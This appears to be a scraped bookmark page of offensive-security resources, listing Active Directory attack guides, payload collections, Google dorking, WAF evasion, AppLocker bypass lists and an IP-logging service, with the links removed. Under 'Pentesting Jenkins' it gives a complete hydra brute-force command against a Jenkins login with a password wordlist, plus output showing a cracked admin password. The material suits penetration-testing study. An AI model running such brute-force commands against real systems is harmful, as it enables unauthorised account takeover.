The Book of Secret Knowledge

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more. - The Book of Secret Knowledge

Awesome hackings

A curated list of awesome Hacking. Inspired by awesome-machine-learning

If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20

For a list of free hacking books available for download, go here - Awesome hacking

IMEI / iCloud Lock Checking - Checks Model, Capacity, Colour, Find My iPhone Status, Replaced Status, Activation Status, Service Coverage, Technical Support, Warranty Plan, Warranty Expiry & Loaner Status for Apple devices. You can also check non-Apple devices to find the Model & Manufacturer. Tool to check details of iDevices (iPhone, iPad) for iCloud lock / find my iPhone. - offers a variety of IMEI Check Services providing all the information about your device, fast and accessible!

MITRE framework - Atomic Red Team

AzureAD Enumeration

Azure Active Directory - Rootsecdev


This is a list of resources and scripts that I have been gathering (and continuing to gather) in preparation for OSCP. - OSCPRepo

itm4n Documentation page

Blog of offensive security consultant.



Active directory exploitation and interesting items - Top 16 Active Directory vulnerabilities

Active Directory Security

Active Directory & Enterprise Security, Methods to Secure Active Directory, Attack Methods & Effective Defenses, PowerShell, Tech Notes, & Geek Trivia…

Pentesting tools - Pentest Tools

PayloadAllTheThings - PayloadAllTheThings

Internet speedtest

Information Security References

  • (2321 kb)

    Fake name generator

    Expired domains

    Search for domains that are about to expire or are already expired.

    Responsible disclosure

    Spamfilter blacklist checking

    Iconic — Free “do wtf you want with” pixel-perfect icons

    GHDB - Google Hacking Database - Google Hacking Database

    Attacking Active Directory: 0 to 0.9 - Attacking Active Directory: 0 to 0.9

    Pentesting Jenkins

    Pwn Jenkins

    $ hydra -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt            
    [ATTEMPT] target - login "admin" - pass "hottie1" - 556 of 14344399 [child 8] (0/0)
    [8080][http-post-form] host:   login: admin   password: spongebob
    [STATUS] attack finished for (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra ( finished at 2021-06-22 15:04:47

    Application Security overview and mitigation list - Appsec Findings database list

    Web Application Firewall (WAF) Evasion Techniques #3 - Web Application Firewall (WAF) Evasion Techniques

    An A-Z Index of Windows CMD commands

    An A-Z Index of Windows CMD commands.

    Pentesting Web checklist

    Pentesting Web checklist

    Grabify IP LOGGER

    Create an URL that will log the IP of visitor(s).

    Grabify IP LOGGER

    Microsoft Portals Overview

    Microsoft has a lot of portals.

    After not remembering all the Microsoft Portal URLs so many times, Adam decided to make a list and with a help from a few others, have gotten to this stage. You can read more about the details on the About page. - Microsoft Administrator Sites - - Microsoft Portals

    List of Github repositories and articles with list of dorks for different search engines - Dorks collections list

    Microsoft AppLocker ByPass Lists - Ultimate AppLocker ByPass List